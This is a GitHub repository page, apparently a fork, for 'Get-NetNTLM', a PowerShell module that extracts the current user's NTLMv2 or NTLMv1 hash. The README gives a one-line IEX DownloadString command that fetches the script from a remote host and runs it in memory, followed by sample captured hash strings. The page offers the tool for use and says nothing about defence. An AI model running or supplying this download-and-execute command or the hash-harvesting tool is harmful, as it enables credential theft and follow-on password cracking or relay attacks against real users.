Skip to content

PowerShell module to get the NTLMv2 / NTLMv1 hash of the current user

License

Notifications You must be signed in to change notification settings

The-Viper-One/Get-NetNTLM

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

Get-NetNTLM

Fork of Get-NetNTLM. This fork includes a fix for calculating NTLMv1 hashes.

Original Author: https://github.com/elnerd/Get-NetNTLM

Load into memory

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/Get-NetNTLM/master/Get-NetNTLM.ps1")
Get-NetNTLM-Hash

# NTLMv2 Output
Truth::SECURITY:1122334455667788:1EBBAE4631E38978BD96AFFF9D40E9C8:010100000000000081E215B0B6E2DA01E63616964D429FF2000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200
76006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000E062A514C37C2EF35D7B478C106C840ED1D0B1EF18AF4D418247281C06FDC1C40A0010000000000000000000000000000000000009
00400048005400540050002F00410054005400410043004B002D00530052005600520045002E00530065006300750072006900740079002E006C006F00630061006C000000000000000000

# NTLMv1 Output
User::WS01:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

About

PowerShell module to get the NTLMv2 / NTLMv1 hash of the current user

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%